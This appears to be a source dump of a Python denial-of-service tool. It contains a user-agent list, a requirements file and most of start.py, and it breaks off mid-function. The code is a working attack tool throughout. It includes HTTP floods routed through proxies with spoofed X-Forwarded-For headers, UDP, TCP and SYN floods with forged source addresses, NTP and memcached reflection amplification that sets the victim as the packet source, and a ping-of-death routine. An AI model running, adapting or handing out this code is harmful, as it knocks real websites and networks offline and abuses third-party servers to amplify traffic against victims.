AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 11 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 12 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.18362 13 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0 14 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 15 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 16 | Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 17 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15 18 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 19 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 OPR/63.0.3368.107 20 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0 21 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15 22 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 23 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763 24 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 25 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 26 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 YaBrowser/19.9.3.314 Yowser/2.5 Safari/537.36 27 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 28 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 29 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36 30 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 31 | Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko 32 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0 33 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 34 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.1 Safari/605.1.15 35 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 36 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15 37 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 38 | Mozilla/5.0 (X11; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0 39 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15 40 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 41 | Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0 42 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 43 | Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko 44 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.2 Safari/605.1.15 45 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 46 | Mozilla/5.0 (Windows NT 6.1; rv:69.0) Gecko/20100101 Firefox/69.0 47 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.1.2 Safari/605.1.15 48 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:69.0) Gecko/20100101 Firefox/69.0 49 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 50 | Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 51 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:70.0) Gecko/20100101 Firefox/70.0 52 | Mozilla/5.0 (Linux; U; Android 4.3; en-us; SM-N900T Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 53 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 54 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 55 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 56 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36 57 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134 58 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 59 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:70.0) Gecko/20100101 Firefox/70.0 60 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 61 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 62 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.75 Safari/537.36 63 | Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0 64 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 65 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/77.0.3865.90 Chrome/77.0.3865.90 Safari/537.36 66 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 67 | Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0 68 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36 69 | Mozilla/5.0 (X11; Linux x86_64; rv:70.0) Gecko/20100101 Firefox/70.0 70 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 71 | Mozilla/5.0 (Windows NT 5.1; rv:52.0) Gecko/20100101 Firefox/52.0 72 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36 73 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.1 Safari/605.1.15 74 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Safari/605.1.15 75 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 OPR/63.0.3368.107 76 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:69.0) Gecko/20100101 Firefox/69.0 77 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 78 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0 Waterfox/56.2.14 79 | Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 80 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36 81 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3835.0 Safari/537.36 82 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36 83 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 84 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:53.0) Gecko/20100101 Firefox/53.0 85 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393 86 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) 87 | Mozilla/5.0 (compatible, MSIE 11, Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko 88 | Mozilla/5.0 (iPad; CPU OS 8_4_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H321 Safari/600.1.4 89 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) 90 | Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G570Y Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36 91 | Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.5.01003) 92 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0 93 | Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8 94 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729) 95 | Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en] 96 | Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1 97 | Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1 -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | pysocks 3 | socks 4 | cfscrape 5 | icmplib 6 | scapy 7 | -------------------------------------------------------------------------------- /screenshot/README.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /screenshot/logo.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/BlueSkyXN-Backup/MHDDoS/e38b55e70e23b47330d8937de7be76b13c6fa5bb/screenshot/logo.ico -------------------------------------------------------------------------------- /start.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding: utf-8 -*- 3 | 4 | l7 = ["CFB", "BYPASS", "GET", "POST", "OVH", "STRESS", "OSTRESS", "DYN", "SLOW", "HEAD", "HIT", "NULL", "COOKIE", "BRUST", "PPS", "EVEN", "GSB", "DGB", "AVB"] 5 | l4 = ["TCP", "UDP", "SYN", "VSE", "MEM", "NTP"] 6 | l3 = ["POD", "ICMP"] 7 | to = ["CFIP", "DNS", "PING", "CHECK", "DSTAT", "INFO"] 8 | ot = ["STOP", "TOOLS", "HELP"] 9 | methods = l7 + l4 + l3 10 | methodsl = l7 + l4 + l3 + to + ot 11 | 12 | 13 | def spoofer(): 14 | addr = [192, 168, 0, 1] 15 | d = '.' 16 | addr[0] = str(random.randrange(11, 197)) 17 | addr[1] = str(random.randrange(0, 255)) 18 | addr[2] = str(random.randrange(0, 255)) 19 | addr[3] = str(random.randrange(2, 254)) 20 | assemebled = addr[0] + d + addr[1] + d + addr[2] + d + addr[3] 21 | return assemebled 22 | 23 | 24 | def start_attack(method, threads, event, socks_type): 25 | global out_file 26 | # layer7 27 | cmethod = str(method.upper()) 28 | if (cmethod != "HIT") and (cmethod not in l4) and (cmethod not in l3) and (cmethod != "OSTRESS"): 29 | out_file = str("files/proxys/" + sys.argv[5]) 30 | proxydl(out_file, socks_type) 31 | print("{} Attack Started To {}:{} For {} Seconds With {}/{} Proxy ".format(method, target, port, sys.argv[7],len(proxies), str(nums))) 32 | else: 33 | print("{} Attack Started To {}:{} For {} Seconds".format(method, target, port, sys.argv[7])) 34 | try: 35 | if method == "post": 36 | for _ in range(threads): 37 | threading.Thread(target=post, args=(event, socks_type), daemon=True).start() 38 | elif method == "brust": 39 | for _ in range(threads): 40 | threading.Thread(target=brust, args=(event, socks_type), daemon=True).start() 41 | elif method == "get": 42 | for _ in range(threads): 43 | threading.Thread(target=http, args=(event, socks_type), daemon=True).start() 44 | elif method == "pps": 45 | for _ in range(threads): 46 | threading.Thread(target=pps, args=(event, socks_type), daemon=True).start() 47 | elif method == "even": 48 | for _ in range(threads): 49 | threading.Thread(target=even, args=(event, socks_type), daemon=True).start() 50 | elif method == "ovh": 51 | for _ in range(threads): 52 | threading.Thread(target=ovh, args=(event, socks_type), daemon=True).start() 53 | elif method == "capb": 54 | for _ in range(threads): 55 | threading.Thread(target=capb, args=(event, socks_type), daemon=True).start() 56 | elif method == "cookie": 57 | for _ in range(threads): 58 | threading.Thread(target=cookie, args=(event, socks_type), daemon=True).start() 59 | elif method == "tor": 60 | for _ in range(threads): 61 | threading.Thread(target=tor, args=(event, socks_type), daemon=True).start() 62 | elif method == "bypass": 63 | for _ in range(threads): 64 | threading.Thread(target=bypass, args=(event, socks_type), daemon=True).start() 65 | elif method == "head": 66 | for _ in range(threads): 67 | threading.Thread(target=head, args=(event, socks_type), daemon=True).start() 68 | elif method == "stress": 69 | for _ in range(threads): 70 | threading.Thread(target=stress, args=(event, socks_type), daemon=True).start() 71 | elif method == "ostress": 72 | for _ in range(threads): 73 | threading.Thread(target=ostress, args=(event, socks_type), daemon=True).start() 74 | elif method == "null": 75 | for _ in range(threads): 76 | threading.Thread(target=null, args=(event, socks_type), daemon=True).start() 77 | elif method == "cfb": 78 | for _ in range(threads): 79 | threading.Thread(target=cfb, args=(event, socks_type), daemon=True).start() 80 | elif method == "avb": 81 | for _ in range(threads): 82 | threading.Thread(target=AVB, args=(event, socks_type), daemon=True).start() 83 | elif method == "gsb": 84 | for _ in range(threads): 85 | threading.Thread(target=gsb, args=(event, socks_type), daemon=True).start() 86 | elif method == "dgb": 87 | for _ in range(threads): 88 | threading.Thread(target=dgb, args=(event, socks_type), daemon=True).start() 89 | elif method == "dyn": 90 | for _ in range(threads): 91 | threading.Thread(target=dyn, args=(event, socks_type), daemon=True).start() 92 | elif method == "hit": 93 | for _ in range(threads): 94 | threading.Thread(target=hit, args=(event, timer), daemon=True).start() 95 | 96 | # layer4 97 | 98 | elif method == "vse": 99 | for _ in range(threads): 100 | threading.Thread(target=vse, args=(event, timer), daemon=True).start() 101 | elif method == "udp": 102 | for _ in range(threads): 103 | threading.Thread(target=udp, args=(event, timer), daemon=True).start() 104 | elif method == "tcp": 105 | for _ in range(threads): 106 | threading.Thread(target=tcp, args=(event, timer), daemon=True).start() 107 | elif method == "syn": 108 | for _ in range(threads): 109 | threading.Thread(target=syn, args=(event, timer), daemon=True).start() 110 | elif method == "mem": 111 | for _ in range(threads): 112 | threading.Thread(target=mem, args=(event, timer), daemon=True).start() 113 | elif method == "ntp": 114 | for _ in range(threads): 115 | threading.Thread(target=ntp, args=(event, timer), daemon=True).start() 116 | 117 | # layer3 118 | elif method == "icmp": 119 | for _ in range(threads): 120 | threading.Thread(target=icmp, args=(event, timer), daemon=True).start() 121 | elif method == "pod": 122 | for _ in range(threads): 123 | threading.Thread(target=pod, args=(event, timer), daemon=True).start() 124 | except: 125 | pass 126 | 127 | def random_data(): 128 | return str(Choice(strings) + str(Intn(0, 271400281257)) + Choice(strings) + str(Intn(0, 271004281257)) + Choice( 129 | strings) + Choice(strings) + str(Intn(0, 271400281257)) + Choice(strings) + str(Intn(0, 271004281257)) + Choice( 130 | strings)) 131 | 132 | 133 | def Headers(method): 134 | header = "" 135 | if method == "get" or method == "head": 136 | connection = "Connection: Keep-Alive\r\n" 137 | accept = Choice(acceptall) + "\r\n" 138 | referer = "Referer: " + referers + target + path + "\r\n" 139 | connection += "Cache-Control: max-age=0\r\n" 140 | connection += "pragma: no-cache\r\n" 141 | connection += "X-Forwarded-For: " + spoofer() + "\r\n" 142 | useragent = "User-Agent: " + UserAgent + "\r\n" 143 | header = referer + useragent + accept + connection + "\r\n\r\n" 144 | elif method == "cookie": 145 | connection = "Connection: Keep-Alive\r\n" 146 | more = "cache-control: no-cache\r\n" 147 | parm = "pragma: no-cache\r\n" 148 | up = "upgrade-insecure-requests: 1" 149 | connection += "Cookies: " + str(secrets.token_urlsafe(16)) + "\r\n" 150 | accept = Choice(acceptall) + "\r\n" 151 | referer = "Referer: " + referers + target + path + "\r\n" 152 | useragent = "User-Agent: " + UserAgent + "\r\n" 153 | header = referer + useragent + accept + connection + more + up + parm + "\r\n\r\n" 154 | elif method == "brust": 155 | connection = "Connection: Keep-Alive\r\n" 156 | more = "Cache-Control: max-age=0\r\n" 157 | more2 = "Via: 1.0 PROXY\r\n" 158 | proxyd = str(proxy) 159 | xfor = "X-Forwarded-For: " + proxyd + "\r\n" 160 | accept = "Accept: */*\r\n" 161 | referer = "Referer: " + referers + target + path + "\r\n" 162 | useragent = "User-Agent: " + UserAgent + "\r\n" 163 | header = referer + useragent + accept + connection + more + xfor + more2 + "\r\n\r\n" 164 | elif method == "even": 165 | up = "Upgrade-Insecure-Requests: 1\r\n" 166 | referer = "Referer: " + referers + target + path + "\r\n" 167 | useragent = "User-Agent: " + UserAgent + "\r\n" 168 | proxyd = str(proxy) 169 | xfor = "X-Forwarded-For: " + proxyd + "\r\n" 170 | header = referer + useragent + up + xfor + "\r\n\r\n" 171 | elif method == "ovh": 172 | accept = Choice(acceptall) + "\r\n" 173 | more = "Connection: keep-alive\r\n" 174 | connection = "Cache-Control: max-age=0\r\n" 175 | connection += "pragma: no-cache\r\n" 176 | connection += "X-Forwarded-For: " + spoofer() + "\r\n" 177 | up = "Upgrade-Insecure-Requests: 1\r\n" 178 | useragent = "User-Agent: " + UserAgent + "\r\n" 179 | header = useragent + more + accept + up + "\r\n\r\n" 180 | elif method == "pps": 181 | header = "GET / HTTP/1.1\r\n\r\n" 182 | elif method == "dyn": 183 | connection = "Connection: Keep-Alive\r\n" 184 | accept = Choice(acceptall) + "\r\n" 185 | connection += "Cache-Control: max-age=0\r\n" 186 | connection += "pragma: no-cache\r\n" 187 | connection += "X-Forwarded-For: " + spoofer() + "\r\n" 188 | referer = "Referer: " + referers + target + path + "\r\n" 189 | useragent = "User-Agent: " + UserAgent + "\r\n" 190 | header = referer + useragent + accept + connection + "\r\n\r\n" 191 | elif method == "socket": 192 | header = "" 193 | elif method == "null": 194 | connection = "Connection: null\r\n" 195 | accept = Choice(acceptall) + "\r\n" 196 | connection += "Cache-Control: max-age=0\r\n" 197 | connection += "pragma: no-cache\r\n" 198 | connection += "X-Forwarded-For: " + spoofer() + "\r\n" 199 | referer = "Referer: null\r\n" 200 | useragent = "User-Agent: null\r\n" 201 | header = referer + useragent + accept + connection + "\r\n\r\n" 202 | elif method == "post": 203 | post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 204 | content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n" 205 | refer = "Referer: http://" + target + path + "\r\n" 206 | user_agent = "User-Agent: " + UserAgent + "\r\n" 207 | accept = Choice(acceptall) + "\r\n" 208 | connection = "Cache-Control: max-age=0\r\n" 209 | connection += "pragma: no-cache\r\n" 210 | connection += "X-Forwarded-For: " + spoofer() + "\r\n" 211 | data = str(random._urandom(8)) 212 | length = "Content-Length: " + str(len(data)) + " \r\nConnection: Keep-Alive\r\n" 213 | header = post_host + accept + connection + refer + content + user_agent + length + "\n" + data + "\r\n\r\n" 214 | elif method == "hit": 215 | post_host = "POST " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 216 | content = "Content-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\n charset=utf-8\r\n" 217 | refer = "Referer: http://" + target + path + "\r\n" 218 | user_agent = "User-Agent: " + UserAgent + "\r\n" 219 | connection = "Cache-Control: max-age=0\r\n" 220 | connection += "pragma: no-cache\r\n" 221 | connection += "X-Forwarded-For: " + spoofer() + "\r\n" 222 | accept = Choice(acceptall) + "\r\n" 223 | data = str(random._urandom(8)) 224 | length = "Content-Length: " + str(len(data)) + " \r\nConnection: Keep-Alive\r\n" 225 | header = post_host + accept + connection + refer + content + user_agent + length + "\n" + data + "\r\n\r\n" 226 | return header 227 | 228 | 229 | def UrlFixer(original_url): 230 | global target, path, port, protocol 231 | original_url = original_url.strip() 232 | url = "" 233 | path = "/" 234 | port = 80 235 | protocol = "http" 236 | if original_url[:7] == "http://": 237 | url = original_url[7:] 238 | elif original_url[:8] == "https://": 239 | url = original_url[8:] 240 | protocol = "https" 241 | tmp = url.split("/") 242 | website = tmp[0] 243 | check = website.split(":") 244 | if len(check) != 1: 245 | port = int(check[1]) 246 | else: 247 | if protocol == "https": 248 | port = 443 249 | target = check[0] 250 | if len(tmp) > 1: 251 | path = url.replace(website, "", 1) 252 | 253 | 254 | def udp(event, timer): 255 | event.wait() 256 | while time.time() < timer: 257 | try: 258 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 259 | try: 260 | for _ in range(multiple): 261 | data = random._urandom(int(Intn(64, 1500))) 262 | s.sendto(data, (str(target), int(port))) 263 | except: 264 | s.close() 265 | except: 266 | s.close() 267 | 268 | def icmp(event, timer): 269 | event.wait() 270 | while time.time() < timer: 271 | try: 272 | for _ in range(multiple): 273 | packet = random._urandom(int(Intn(64, 1500))) 274 | pig(target, count=10, interval=0.2, payload_size=len(packet), payload=packet) 275 | except: 276 | pass 277 | 278 | ntp_payload = "\x17\x00\x03\x2a" + "\x00" * 4 279 | 280 | 281 | def ntp(event, timer): 282 | packets = Intn(10, 150) 283 | server = Choice(ntpsv) 284 | event.wait() 285 | while time.time() < timer: 286 | try: 287 | packet = ( 288 | IP(dst=server, src=target) 289 | / UDP(sport=Intn(2000, 65535), dport=int(port)) 290 | / Raw(load=ntp_payload) 291 | ) 292 | try: 293 | for _ in range(multiple): 294 | send(packet, count=packets, verbose=False) 295 | except: 296 | pass 297 | except: 298 | pass 299 | 300 | 301 | mem_payload = "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" 302 | 303 | 304 | def mem(event, timer): 305 | packets = Intn(10, 150) 306 | server = Choice(memsv) 307 | event.wait() 308 | while time.time() < timer: 309 | try: 310 | try: 311 | packet = ( 312 | IP(dst=server, src=target) 313 | / UDP(sport=port, dport=11211) 314 | / Raw(load=mem_payload) 315 | ) 316 | for _ in range(multiple): 317 | send(packet, count=packets, verbose=False) 318 | except: 319 | pass 320 | except: 321 | pass 322 | 323 | def tcp(event, timer): 324 | event.wait() 325 | while time.time() < timer: 326 | try: 327 | data = random._urandom(int(Intn(1024, 65535))) 328 | address = (str(target), int(port)) 329 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 330 | try: 331 | s.connect(address) 332 | for _ in range(multiple): 333 | s.send(data) 334 | except: 335 | s.close() 336 | except: 337 | s.close() 338 | 339 | 340 | class DNSQuery: 341 | def __init__(self, data): 342 | self.data = data 343 | self.dominio = '' 344 | self.DnsType = '' 345 | 346 | HDNS=data[-4:-2].encode("hex") 347 | if HDNS == "0001": 348 | self.DnsType='A' 349 | elif HDNS == "000f": 350 | self.DnsType='MX' 351 | elif HDNS == "0002": 352 | self.DnsType='NS' 353 | elif HDNS == "0010": 354 | self.DnsType="TXT" 355 | else: 356 | self.DnsType="Unknown" 357 | 358 | tipo = (ord(data[2]) >> 3) & 15 # Opcode bits 359 | if tipo == 0: # Standard query 360 | ini=12 361 | lon=ord(data[ini]) 362 | while lon != 0: 363 | self.dominio+=data[ini+1:ini+lon+1]+'.' 364 | ini+=lon+1 365 | lon=ord(data[ini]) 366 | def respuesta(self, ip): 367 | packet='' 368 | if self.dominio: 369 | packet+=self.data[:2] + "\x81\x80" 370 | packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' # Questions and Answers Counts 371 | packet+=self.data[12:] # Original Domain Name Question 372 | packet+='\xc0\x0c' # Pointer to domain name 373 | packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' # Response type, ttl and resource data length -> 4 bytes 374 | packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) # 4bytes of IP 375 | return packet 376 | 377 | def dns(event, timer): 378 | event.wait() 379 | while time.time() < timer: 380 | try: 381 | s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 382 | s.bind(('',53)) 383 | data, addr = s.recvfrom(1024) 384 | p = DNSQuery(data) 385 | for _ in range(multiple): 386 | s.sendto(p.respuesta(target), addr) 387 | except: 388 | s.close() 389 | 390 | def syn(event, timer): 391 | event.wait() 392 | while time.time() < timer: 393 | try: 394 | IP_Packet = IP () 395 | IP_Packet.src = randomIP() 396 | IP_Packet.dst = target 397 | 398 | TCP_Packet = TCP () 399 | TCP_Packet.sport = randint(1, 65535) 400 | TCP_Packet.dport = int(port) 401 | TCP_Packet.flags = "S" 402 | TCP_Packet.seq = randint(1000, 9000) 403 | TCP_Packet.window = randint(1000, 9000) 404 | for _ in range(multiple): 405 | send(IP_Packet/TCP_Packet, verbose=0) 406 | except: 407 | pass 408 | 409 | 410 | def pod(event, timer): 411 | event.wait() 412 | while time.time() < timer: 413 | try: 414 | rand_addr = spoofer() 415 | ip_hdr = IP(src=rand_addr, dst=target) 416 | packet = ip_hdr / ICMP() / ("m" * 65535) 417 | send(packet) 418 | except: 419 | pass 420 | 421 | 422 | def stop(): 423 | print('All Attacks Stopped !') 424 | os.system('pkill python*') 425 | exit() 426 | 427 | 428 | def dyn(event, socks_type): 429 | header = Headers("dyn") 430 | proxy = Choice(proxies).strip().split(":") 431 | get_host = "GET " + path + "?" + random_data() + " HTTP/1.1\r\nHost: " + random_data() + "." + target + "\r\n" 432 | 433 | request = get_host + header 434 | event.wait() 435 | while time.time() < timer: 436 | try: 437 | s = socks.socksocket() 438 | if socks_type == 4: 439 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 440 | if socks_type == 5: 441 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 442 | if socks_type == 1: 443 | s.set_proxy(socks.HTTP, str(proxy[0]), int(proxy[1])) 444 | s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) 445 | s.connect((str(target), int(port))) 446 | if protocol == "https": 447 | ctx = ssl.SSLContext() 448 | s = ctx.wrap_socket(s, server_hostname=target) 449 | try: 450 | for _ in range(multiple): 451 | s.send(str.encode(request)) 452 | except: 453 | s.close() 454 | except: 455 | s.close() 456 | 457 | 458 | def http(event, socks_type): 459 | header = Headers("get") 460 | proxy = Choice(proxies).strip().split(":") 461 | get_host = "GET " + path + " HTTP/1.1\r\nHost: " + target + "\r\n" 462 | request = get_host + header 463 | event.wait() 464 | while time.time() < timer: 465 | try: 466 | s = socks.socksocket() 467 | if socks_type == 4: 468 | s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) 469 | if socks_type == 5: 470 | s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) 471 | if socks_type == 1: 472 | s.set_proxy(socks.HTTP, str(proxy[0]), 